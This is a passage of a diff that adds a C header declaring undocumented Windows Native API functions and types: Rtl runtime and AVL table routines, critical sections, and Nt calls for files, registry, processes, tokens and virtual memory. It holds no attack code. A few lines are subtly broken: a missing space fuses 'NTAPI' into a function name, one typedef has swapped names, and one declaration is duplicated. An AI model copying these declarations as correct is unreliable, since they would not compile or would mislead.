_In_ PCWSTR DosFileName, + _Out_ PUNICODE_STRING NtFileName, + _Out_opt_ PWSTR *FilePart, + PVOID Reserved + ); + +NTSTATUS NTAPI RtlGetCompressionWorkSpaceSize( + _In_ USHORT CompressionFormatAndEngine, + _Out_ PULONG CompressBufferWorkSpaceSize, + _Out_ PULONG CompressFragmentWorkSpaceSize + ); + +NTSTATUS NTAPI RtlCompressBuffer( + _In_ USHORT CompressionFormatAndEngine, + _In_ PUCHAR UncompressedBuffer, + _In_ ULONG UncompressedBufferSize, + _Out_ PUCHAR CompressedBuffer, + _In_ ULONG CompressedBufferSize, + _In_ ULONG UncompressedChunkSize, + _Out_ PULONG FinalCompressedSize, + _In_ PVOID WorkSpace + ); + +NTSTATUS NTAPI RtlDecompressBuffer( + _In_ USHORT CompressionFormat, + _Out_ PUCHAR UncompressedBuffer, + _In_ ULONG UncompressedBufferSize, + _In_ PUCHAR CompressedBuffer, + _In_ ULONG CompressedBufferSize, + _Out_ PULONG FinalUncompressedSize + ); + +PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader( + _In_ PVOID Base + ); + +NTSYSAPI PVOID NTAPI RtlAddressInSectionTable( + _In_ PIMAGE_NT_HEADERS NtHeaders, + _In_ PVOID BaseOfImage, + _In_ ULONG VirtualAddress + ); + +PVOID NTAPI RtlImageDirectoryEntryToData( + PVOID BaseOfImage, + BOOLEAN MappedAsImage, + USHORT DirectoryEntry, + PULONG Size + ); + +VOID NTAPI RtlSecondsSince1970ToTime( + ULONG ElapsedSeconds, + PLARGE_INTEGER Time + ); + +VOID NTAPI RtlSecondsSince1980ToTime( + ULONG ElapsedSeconds, + PLARGE_INTEGER Time + ); + +BOOLEAN NTAPI RtlTimeToSecondsSince1980( + PLARGE_INTEGER Time, + PULONG ElapsedSeconds + ); + +VOID NTAPI RtlTimeToTimeFields( + _Inout_ PLARGE_INTEGER Time, + _Inout_ PTIME_FIELDS TimeFields + ); + +BOOLEAN NTAPI RtlTimeFieldsToTime( + PTIME_FIELDS TimeFields, + PLARGE_INTEGER Time + ); + +ULONG32 NTAPI RtlComputeCrc32( + _In_ ULONG32 PartialCrc, + _In_ PVOID Buffer, + _In_ ULONG Length + ); + +VOID NTAPI RtlGetNtVersionNumbers( + _Out_opt_ PULONG MajorVersion, + _Out_opt_ PULONG MinorVersion, + _Out_opt_ PULONG BuildNumber + ); + +PPEB NTAPI RtlGetCurrentPeb( + VOID + ); + +PWSTR NTAPI RtlIpv4AddressToStringW( + __in const struct in_addr *Addr, + __out_ecount(16) PWSTR S + ); + +NTSTATUS NTAPI RtlAdjustPrivilege( + ULONG Privilege, + BOOLEAN Enable, + BOOLEAN Client, + PBOOLEAN WasEnabled + ); + +ULONG DbgPrint( + _In_ PCH Format, + ... + ); + +/* +** Runtime Library API END +*/ + +/* +** Generic AVL API START +*/ +typedef ULONG CLONG; + +typedef enum _TABLE_SEARCH_RESULT { + TableEmptyTree, + TableFoundNode, + TableInsertAsLeft, + TableInsertAsRight +} TABLE_SEARCH_RESULT; + +typedef enum _RTL_GENERIC_COMPARE_RESULTS { + GenericLessThan, + GenericGreaterThan, + GenericEqual +} RTL_GENERIC_COMPARE_RESULTS; + +typedef struct _RTL_AVL_TABLE RTL_AVL_TABLE; +typedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE; + +typedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)( + _In_ _RTL_AVL_TABLE *Table, + _In_ PVOID FirstStruct, + _In_ PVOID SecondStruct + ); + +typedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)( + _In_ _RTL_AVL_TABLE *Table, + _In_ ULONG ByteSize + ); + +typedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)( + _In_ _RTL_AVL_TABLE *Table, + _In_ _Post_invalid_ PVOID Buffer + ); + +typedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)( + _In_ _RTL_AVL_TABLE *Table, + _In_ PVOID UserData, + _In_ PVOID MatchData + ); + +typedef struct _RTL_BALANCED_LINKS { + struct _RTL_BALANCED_LINKS *Parent; + struct _RTL_BALANCED_LINKS *LeftChild; + struct _RTL_BALANCED_LINKS *RightChild; + CHAR Balance; + UCHAR Reserved[3]; +} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS; + +typedef struct _RTL_AVL_TABLE { + RTL_BALANCED_LINKS BalancedRoot; + PVOID OrderedPointer; + ULONG WhichOrderedElement; + ULONG NumberGenericTableElements; + ULONG DepthOfTree; + PRTL_BALANCED_LINKS RestartKey; + ULONG DeleteCount; + PRTL_AVL_COMPARE_ROUTINE CompareRoutine; + PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine; + PRTL_AVL_FREE_ROUTINE FreeRoutine; + PVOID TableContext; +} RTL_AVL_TABLE, *PRTL_AVL_TABLE; + +VOID NTAPI RtlInitializeGenericTableAvl( + _Out_ PRTL_AVL_TABLE Table, + _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine, + _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine, + _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine, + _In_opt_ PVOID TableContext + ); + +PVOID NTAPI RtlInsertElementGenericTableAvl( + _In_ PRTL_AVL_TABLE Table, + _In_reads_bytes_(BufferSize) PVOID Buffer, + _In_ CLONG BufferSize, + _Out_opt_ PBOOLEAN NewElement + ); + +PVOID NTAPI RtlInsertElementGenericTableFullAvl( + _In_ PRTL_AVL_TABLE Table, + _In_reads_bytes_(BufferSize) PVOID Buffer, + _In_ CLONG BufferSize, + _Out_opt_ PBOOLEAN NewElement, + _In_ PVOID NodeOrParent, + _In_ TABLE_SEARCH_RESULT SearchResult + ); + +BOOLEAN NTAPI RtlDeleteElementGenericTableAvl( + _In_ PRTL_AVL_TABLE Table, + _In_ PVOID Buffer + ); + +PVOID NTAPI RtlLookupElementGenericTableAvl( + _In_ PRTL_AVL_TABLE Table, + _In_ PVOID Buffer + ); + +PVOID NTAPI RtlLookupElementGenericTableFullAvl( + _In_ PRTL_AVL_TABLE Table, + _In_ PVOID Buffer, + _Out_ PVOID *NodeOrParent, + _Out_ TABLE_SEARCH_RESULT *SearchResult + ); + +PVOID NTAPI RtlEnumerateGenericTableAvl( + _In_ PRTL_AVL_TABLE Table, + _In_ BOOLEAN Restart + ); + +PVOID NTAPI RtlEnumerateGenericTableWithoutSplayingAvl( + _In_ PRTL_AVL_TABLE Table, + _Inout_ PVOID *RestartKey + ); + +PVOID NTAPI RtlLookupFirstMatchingElementGenericTableAvl( + _In_ PRTL_AVL_TABLE Table, + _In_ PVOID Buffer, + _Out_ PVOID *RestartKey + ); + +PVOID NTAPI RtlEnumerateGenericTableLikeADirectory( + _In_ PRTL_AVL_TABLE Table, + _In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction, + _In_opt_ PVOID MatchData, + _In_ ULONG NextFlag, + _Inout_ PVOID *RestartKey, + _Inout_ PULONG DeleteCount, + _In_ PVOID Buffer + ); + +PVOID NTAPI RtlGetElementGenericTableAvl( + _In_ PRTL_AVL_TABLE Table, + _In_ ULONG I + ); + +ULONG NTAPI RtlNumberGenericTableElementsAvl( + _In_ PRTL_AVL_TABLE Table + ); + +BOOLEAN NTAPI RtlIsGenericTableEmptyAvl( + _In_ PRTL_AVL_TABLE Table + ); + +/* +** Generic Avl END +*/ + +/* +** Critical Section START +*/ +#define LOGICAL ULONG + +NTSTATUS NTAPI RtlEnterCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +NTSTATUS NTAPI RtlLeaveCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +LOGICAL NTAPI RtlIsCriticalSectionLocked( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + +LOGICAL NTAPI RtlIsCriticalSectionLockedByThread( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + +ULONG NTAPI RtlGetCriticalSectionRecursionCount( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + +LOGICAL NTAPI RtlTryEnterCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +NTSTATUS NTAPI RtlInitializeCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +VOID NTAPI RtlEnableEarlyCriticalSectionEventCreation( + VOID + ); + +NTSTATUS NTAPI RtlInitializeCriticalSectionAndSpinCount( + PRTL_CRITICAL_SECTION CriticalSection, + ULONG SpinCount + ); + +ULONG NTAPI RtlSetCriticalSectionSpinCount( + PRTL_CRITICAL_SECTION CriticalSection, + ULONG SpinCount + ); + +NTSTATUS NTAPI RtlDeleteCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +/* +** Critical Section END +*/ + + +/* +** Loader API START +*/ + +NTSTATUS NTAPI LdrGetProcedureAddress( + _In_ PVOID DllHandle, + _In_opt_ CONST ANSI_STRING* ProcedureName, + _In_opt_ ULONG ProcedureNumber, + _Out_ PVOID *ProcedureAddress + ); + +/* +** Loader API END +*/ + +/* +** Native API START +*/ + +NTSTATUS NTAPI NtClose( + _In_ HANDLE Handle + ); + +NTSTATUS NTAPI NtOpenDirectoryObject( + _Out_ PHANDLE DirectoryHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtQueryDirectoryObject( + _In_ HANDLE DirectoryHandle, + _Out_opt_ PVOID Buffer, + _In_ ULONG Length, + _In_ BOOLEAN ReturnSingleEntry, + _In_ BOOLEAN RestartScan, + _Inout_ PULONG Context, + PULONG ReturnLength + ); + +NTSTATUS NTAPI NtQueryObject( + _In_opt_ HANDLE Handle, + _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass, + _Out_opt_ PVOID ObjectInformation, + _In_ ULONG ObjectInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS WINAPI NtQuerySystemInformation( + _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, + _Inout_ PVOID SystemInformation, + _In_ ULONG SystemInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtCreateMutant( + _Out_ PHANDLE MutantHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ BOOLEAN InitialOwner + ); + +NTSTATUS NTAPI NtOpenMutant( + _Out_ PHANDLE MutantHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtQueryMutant( + _In_ HANDLE MutantHandle, + _In_ MUTANT_INFORMATION_CLASS MutantInformationClass, + _Out_ PVOID MutantInformation, + _In_ ULONG MutantInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtReleaseMutant( + _In_ HANDLE MutantHandle, + _Out_opt_ PLONG PreviousCount + ); + +NTSTATUS NTAPI NtCreateTimer( + _In_ PHANDLE TimerHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ TIMER_TYPE TimerType + ); + +NTSTATUS NtSetTimer( + _In_ HANDLE TimerHandle, + _In_ PLARGE_INTEGER DueTime, + _In_opt_ PTIMER_APC_ROUTINE TimerApcRoutine, + _In_opt_ PVOID TimerContext, + _In_ BOOLEAN WakeTimer, + _In_opt_ LONG Period, + _Out_opt_ PBOOLEAN PreviousState + ); + +NTSTATUS NTAPI NtOpenTimer( + _In_ PHANDLE TimerHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtQueryTimer( + _In_ HANDLE TimerHandle, + _In_ TIMER_INFORMATION_CLASS TimerInformationClass, + _Out_ PVOID TimerInformation, + _In_ ULONG TimerInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtCreateSymbolicLinkObject( + _Out_ PHANDLE LinkHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ PUNICODE_STRING LinkTarget + ); + +NTSTATUS WINAPI NtOpenSymbolicLinkObject( + _Out_ PHANDLE LinkHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtQuerySymbolicLinkObject( + _In_ HANDLE LinkHandle, + _Inout_ PUNICODE_STRING LinkTarget, + _Out_opt_ PULONG ReturnedLength + ); + +NTSTATUS NTAPI NtQuerySemaphore( + _In_ HANDLE SemaphoreHandle, + _In_ SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass, + _Out_ PVOID SemaphoreInformation, + _In_ ULONG SemaphoreInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtQueryDirectoryFile( + _In_ HANDLE FileHandle, + _In_opt_ HANDLE Event, + _In_opt_ PIO_APC_ROUTINE ApcRoutine, + _In_opt_ PVOID ApcContext, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _Out_ PVOID FileInformation, + _In_ ULONG Length, + _In_ FILE_INFORMATION_CLASS FileInformationClass, + _In_ BOOLEAN ReturnSingleEntry, + _In_opt_ PUNICODE_STRING FileName, + _In_ BOOLEAN RestartScan + ); + +NTSTATUS NTAPI NtQuerySection( + _In_ HANDLE SectionHandle, + _In_ SECTION_INFORMATION_CLASS SectionInformationClass, + _Out_ PVOID SectionInformation, + _In_ SIZE_T SectionInformationLength, + _Out_opt_ PSIZE_T ReturnLength + ); + +NTSTATUS NtOpenSection( + _Out_ PHANDLE SectionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtCreateSection( + _Out_ PHANDLE SectionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PLARGE_INTEGER MaximumSize, + _In_ ULONG SectionPageProtection, + _In_ ULONG AllocationAttributes, + _In_opt_ HANDLE FileHandle + ); + +NTSTATUS NTAPI NtMapViewOfSection( + _In_ HANDLE SectionHandle, + _In_ HANDLE ProcessHandle, + __inout PVOID *BaseAddress, + _In_ ULONG_PTR ZeroBits, + _In_ SIZE_T CommitSize, + _Inout_opt_ PLARGE_INTEGER SectionOffset, + _Inout_ PSIZE_T ViewSize, + _In_ SECTION_INHERIT InheritDisposition, + _In_ ULONG AllocationType, + _In_ ULONG Win32Protect + ); + +NTSTATUS NTAPI NtUnmapViewOfSection( + _In_ HANDLE ProcessHandle, + _In_ PVOID BaseAddress + ); + +NTSTATUS NTAPI NtOpenProcessToken( + _In_ HANDLE ProcessHandle, + _In_ ACCESS_MASK DesiredAccess, + _Out_ PHANDLE TokenHandle + ); + + +NTSTATUS NTAPI NtOpenThreadTokenEx( + _In_ HANDLE ThreadHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ BOOLEAN OpenAsSelf, + _In_ ULONG HandleAttributes, + _Out_ PHANDLE TokenHandle + ); + +NTSTATUS NTAPI NtAdjustPrivilegesToken( + _In_ HANDLE TokenHandle, + _In_ BOOLEAN DisableAllPrivileges, + _In_opt_ PTOKEN_PRIVILEGES NewState, + _In_opt_ ULONG BufferLength, + _Out_opt_ PTOKEN_PRIVILEGES PreviousState, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtQueryInformationToken( + _In_ HANDLE TokenHandle, + _In_ TOKEN_INFORMATION_CLASS TokenInformationClass, + _Out_ PVOID TokenInformation, + _In_ ULONG TokenInformationLength, + _Out_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtOpenKey( + _Out_ PHANDLE KeyHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtQueryKey( + _In_ HANDLE KeyHandle, + _In_ KEY_INFORMATION_CLASS KeyInformationClass, + _Out_opt_ PVOID KeyInformation, + _In_ ULONG Length, + _Out_ PULONG ResultLength + ); + +NTSTATUS NTAPI NtQueryValueKey( + _In_ HANDLE KeyHandle, + _In_ PUNICODE_STRING ValueName, + _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, + _Out_ PVOID KeyValueInformation, + _In_ ULONG Length, + _Out_ PULONG ResultLength + ); + +NTSTATUS NTAPI NtDeleteKey( + _In_ HANDLE KeyHandle + ); + +NTSTATUS NTAPI NtDeleteValueKey( + _In_ HANDLE KeyHandle, + _In_ PUNICODE_STRING ValueName + ); + +NTSTATUS NTAPI NtOpenJobObject( + _Out_ PHANDLE JobHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtQueryInformationJobObject( + _In_opt_ HANDLE JobHandle, + _In_ JOBOBJECTINFOCLASS JobObjectInformationClass, + _Out_ PVOID JobObjectInformation, + _In_ ULONG JobObjectInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtOpenIoCompletion( + _Out_ PHANDLE IoCompletionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtQueryIoCompletion( + _In_ HANDLE IoCompletionHandle, + _In_ IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass, + _Out_ PVOID IoCompletionInformation, + _In_ ULONG IoCompletionInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtQueryInformationFile( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _Out_ PVOID FileInformation, + _In_ ULONG Length, + _In_ FILE_INFORMATION_CLASS FileInformationClass + ); + +NTSTATUS NTAPI NtFsControlFile( + _In_ HANDLE FileHandle, + _In_opt_ HANDLE Event, + _In_opt_ PIO_APC_ROUTINE ApcRoutine, + _In_opt_ PVOID ApcContext, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_ ULONG FsControlCode, + _In_ PVOID InputBuffer, + _In_ ULONG InputBufferLength, + _Out_ PVOID OutputBuffer, + _In_ ULONG OutputBufferLength + ); + +NTSTATUS NTAPI NtQueryDirectoryFile( + _In_ HANDLE FileHandle, + _In_opt_ HANDLE Event, + _In_opt_ PIO_APC_ROUTINE ApcRoutine, + _In_opt_ PVOID ApcContext, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _Out_ PVOID FileInformation, + _In_ ULONG Length, + _In_ FILE_INFORMATION_CLASS FileInformationClass, + _In_ BOOLEAN ReturnSingleEntry, + _In_opt_ PUNICODE_STRING FileName, + _In_ BOOLEAN RestartScan + ); + +NTSTATUS NTAPI NtQueryEaFile( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + __out_bcount(Length) PVOID Buffer, + _In_ ULONG Length, + _In_ BOOLEAN ReturnSingleEntry, + __in_bcount_opt(EaListLength) PVOID EaList, + _In_ ULONG EaListLength, + _In_opt_ PULONG EaIndex, + _In_ BOOLEAN RestartScan + ); + +NTSTATUS NTAPI NtSetEaFile( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + __in_bcount(Length) PVOID Buffer, + _In_ ULONG Length + ); + +NTSTATUS NTAPI NtQueryVolumeInformationFile( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _Out_ PVOID FsInformation, + _In_ ULONG Length, + _In_ FS_INFORMATION_CLASS FsInformationClass + ); + +NTSTATUS NTAPI NtOpenFile( + _Out_ PHANDLE FileHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_ ULONG ShareAccess, + _In_ ULONG OpenOptions + ); + +NTSTATUS NTAPI NtReadFile( + _In_ HANDLE FileHandle, + _In_opt_ HANDLE Event, + _In_opt_ PIO_APC_ROUTINE ApcRoutine, + _In_opt_ PVOID ApcContext, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + __out_bcount(Length) PVOID Buffer, + _In_ ULONG Length, + _In_opt_ PLARGE_INTEGER ByteOffset, + _In_opt_ PULONG Key + ); + +NTSTATUS NTAPI NtWriteFile( + _In_ HANDLE FileHandle, + _In_opt_ HANDLE Event, + _In_opt_ PIO_APC_ROUTINE ApcRoutine, + _In_opt_ PVOID ApcContext, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_ PVOID Buffer, + _In_ ULONG Length, + _In_opt_ PLARGE_INTEGER ByteOffset, + _In_opt_ PULONG Key + ); + +NTSTATUS NTAPI NtFlushBuffersFile( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock + ); + +NTSTATUS NTAPI NtSetInformationFile( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + __in_bcount(Length) PVOID FileInformation, + _In_ ULONG Length, + _In_ FILE_INFORMATION_CLASS FileInformationClass + ); + +NTSTATUS NTAPI NtDeleteFile( + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtOpenEvent( + _Out_ PHANDLE EventHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtOpenKeyedEvent( + _Out_ PHANDLE KeyedEventHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtOpenSemaphore( + _Out_ PHANDLE SemaphoreHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSTATUS NTAPI NtQueryEvent( + _In_ HANDLE EventHandle, + _In_ EVENT_INFORMATION_CLASS EventInformationClass, + _Out_ PVOID EventInformation, + _In_ ULONG EventInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtOpenEventPair( + _Out_ PHANDLE EventPairHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +//TmTx +NTSTATUS NTAPI NtCreateTransaction( + _Out_ PHANDLE TransactionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ LPGUID Uow, + _In_opt_ HANDLE TmHandle, + _In_opt_ ULONG CreateOptions, + _In_opt_ ULONG IsolationLevel, + _In_opt_ ULONG IsolationFlags, + _In_opt_ PLARGE_INTEGER Timeout, + _In_opt_ PUNICODE_STRING Description + ); + +//TmRm +NTSTATUS NTAPINtCreateResourceManager( + _Out_ PHANDLE ResourceManagerHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ HANDLE TmHandle, + _In_opt_ LPGUID ResourceManagerGuid, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ ULONG CreateOptions, + _In_opt_ PUNICODE_STRING Description + ); + +//TmEn +NTSTATUS NTAPI NtCreateEnlistment( + _Out_ PHANDLE EnlistmentHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ HANDLE ResourceManagerHandle, + _In_ HANDLE TransactionHandle, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ ULONG CreateOptions, + _In_ NOTIFICATION_MASK NotificationMask, + _In_opt_ PVOID EnlistmentKey + ); + +//TmTm +NTSTATUS NTAPI NtCreateTransactionManager( + _Out_ PHANDLE TmHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PUNICODE_STRING LogFileName, + _In_opt_ ULONG CreateOptions, + _In_opt_ ULONG CommitStrength + ); + +NTSTATUS NTAPI NtCreateFile( + _Out_ PHANDLE FileHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_opt_ PLARGE_INTEGER AllocationSize, + _In_ ULONG FileAttributes, + _In_ ULONG ShareAccess, + _In_ ULONG CreateDisposition, + _In_ ULONG CreateOptions, + _In_opt_ PVOID EaBuffer, + _In_ ULONG EaLength + ); + +NTSTATUS NTAPI NtOpenProcess( + _Out_ PHANDLE ProcessHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PCLIENT_ID ClientId + ); + +NTSTATUS NTAPI NtTerminateProcess( + _In_opt_ HANDLE ProcessHandle, + _In_ NTSTATUS ExitStatus + ); + +NTSTATUS NTAPI NtSuspendThread( + _In_ HANDLE ThreadHandle, + _Out_opt_ PULONG PreviousSuspendCount + ); + +NTSTATUS NTAPI NtResumeThread( + _In_ HANDLE ThreadHandle, + _Out_opt_ PULONG PreviousSuspendCount + ); + +NTSTATUS NTAPI NtOpenThread( + _Out_ PHANDLE ThreadHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PCLIENT_ID ClientId + ); + +NTSTATUS NTAPI NtImpersonateThread( + _In_ HANDLE ServerThreadHandle, + _In_ HANDLE ClientThreadHandle, + _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos + ); + +NTSTATUS NTAPI NtSetContextThread( + _In_ HANDLE ThreadHandle, + _In_ PCONTEXT ThreadContext + ); + +NTSTATUS NTAPI NtGetContextThread( + _In_ HANDLE ThreadHandle, + _Inout_ PCONTEXT ThreadContext + ); + +NTSTATUS NTAPI NtQueryInformationProcess( + _In_ HANDLE ProcessHandle, + _In_ PROCESSINFOCLASS ProcessInformationClass, + _Out_ PVOID ProcessInformation, + _In_ ULONG ProcessInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +NTSTATUS NTAPI NtDuplicateObject( + _In_ HANDLE SourceProcessHandle, + _In_ HANDLE SourceHandle, + _In_opt_ HANDLE TargetProcessHandle, + _Out_ PHANDLE TargetHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ ULONG HandleAttributes, + _In_ ULONG Options + ); + +NTSTATUS NTAPI NtSetSecurityObject( + _In_ HANDLE Handle, + _In_ SECURITY_INFORMATION SecurityInformation, + _In_ PSECURITY_DESCRIPTOR SecurityDescriptor + ); + +NTSTATUS NTAPI NtQuerySecurityObject( + _In_ HANDLE Handle, + _In_ SECURITY_INFORMATION SecurityInformation, + _Out_ PSECURITY_DESCRIPTOR SecurityDescriptor, + _In_ ULONG Length, + _Out_ PULONG LengthNeeded + ); + +NTSTATUS NtCreateIoCompletion( + _Out_ PHANDLE IoCompletionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ ULONG Count + ); + +NTSTATUS NTAPI NtCreateEvent( + _Out_ PHANDLE EventHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ EVENT_TYPE EventType, + _In_ BOOLEAN InitialState + ); + +NTSTATUS NTAPI NtAllocateVirtualMemory( + _In_ HANDLE ProcessHandle, + _Inout_ PVOID *BaseAddress, + _In_ ULONG_PTR ZeroBits, + _Inout_ PSIZE_T RegionSize, + _In_ ULONG AllocationType, + _In_ ULONG Protect + ); + +NTSTATUS NTAPI NtFreeVirtualMemory( + _In_ HANDLE ProcessHandle, + _Inout_ PVOID *BaseAddress, + _Inout_ PSIZE_T RegionSize, + _In_ ULONG FreeType + ); + +NTSTATUS NTAPI NtQueryVirtualMemory( + _In_ HANDLE ProcessHandle, + _In_ PVOID BaseAddress, + _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass, + _Out_ PVOID MemoryInformation, + _In_ SIZE_T MemoryInformationLength, + _Out_opt_ PSIZE_T ReturnLength + ); + +NTSTATUS NTAPI NtReadVirtualMemory( + _In_ HANDLE ProcessHandle, + _In_opt_ PVOID BaseAddress, + _Out_ PVOID Buffer, + _In_ SIZE_T BufferSize, + _Out_opt_ PSIZE_T NumberOfBytesRead + ); + +NTSTATUS NTAPI NtWriteVirtualMemory( + _In_ HANDLE ProcessHandle, + _In_opt_ PVOID BaseAddress, + _In_ VOID *Buffer, + _In_ SIZE_T BufferSize, + _Out_opt_ PSIZE_T NumberOfBytesWritten + ); + +NTSTATUS NTAPI NtProtectVirtualMemory( + _In_ HANDLE ProcessHandle, + _Inout_ PVOID *BaseAddress, + _Inout_ PSIZE_T RegionSize, + _In_ ULONG NewProtect, + _Out_ PULONG OldProtect + ); + +NTSTATUS NTAPI NtEnumerateKey( + _In_ HANDLE KeyHandle, + _In_ ULONG Index, + _In_ KEY_INFORMATION_CLASS KeyInformationClass, + _Out_opt_ PVOID KeyInformation, + _In_ ULONG Length, + _Out_ PULONG ResultLength + ); + +NTSTATUS NTAPI NtCreatePort( + _Out_ PHANDLE PortHandle, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ ULONG MaxConnectionInfoLength, + _In_ ULONG MaxMessageLength, + _In_ ULONG MaxPoolUsage + ); + +NTSTATUS NTAPI NtCompleteConnectPort( + _In_ HANDLE PortHandle + ); + +NTSTATUS NTAPI NtListenPort( + _In_ HANDLE PortHandle, + _Out_ PPORT_MESSAGE ConnectionRequest + ); + +NTSTATUS NTAPI NtReplyPort( + _In_ HANDLE PortHandle, + _In_ PPORT_MESSAGE ReplyMessage + ); + +NTSTATUS NTAPI NtReplyWaitReplyPort( + _In_ HANDLE PortHandle, + _Inout_ PPORT_MESSAGE ReplyMessage + ); + +NTSTATUS NTAPI NtRequestPort( + _In_ 